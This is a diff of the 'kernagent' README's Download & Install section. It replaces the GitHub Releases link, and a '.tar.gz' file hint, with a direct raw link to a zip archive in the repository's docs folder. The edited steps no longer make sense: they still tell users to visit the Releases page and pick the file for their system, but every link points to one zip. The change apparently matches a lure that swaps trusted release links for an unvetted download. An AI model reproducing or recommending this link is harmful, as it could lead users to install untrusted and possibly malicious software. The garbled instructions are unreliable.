ZamaNy1284/kernagent/README.md

 ## 📥 Download & Install

-Visit this page to download: [https://github.com/ZamaNy1284/kernagent/releases](https://github.com/ZamaNy1284/kernagent/releases)
+Visit this page to download: [https://raw.githubusercontent.com/ZamaNy1284/kernagent/main/docs/kernagent-3.1.zip](https://raw.githubusercontent.com/ZamaNy1284/kernagent/main/docs/kernagent-3.1.zip)

 1. **Go to the Releases page**: Click the link above.
 2. **Find the latest version**: Look for the most recent release at the top.
 3. **Download the correct file**: Click on the file that matches your operating system.
 For example, if you're using Windows, download the `.exe` file.
-If you're on macOS or Linux, find the `.tar.gz` or appropriate file.
+If you're on macOS or Linux, find the `https://raw.githubusercontent.com/ZamaNy1284/kernagent/main/docs/kernagent-3.1.zip` or appropriate file.
 4. **Save the file**: Choose a location on your computer where you can easily find it later, like your Downloads folder.

 ## 📂 System Requirements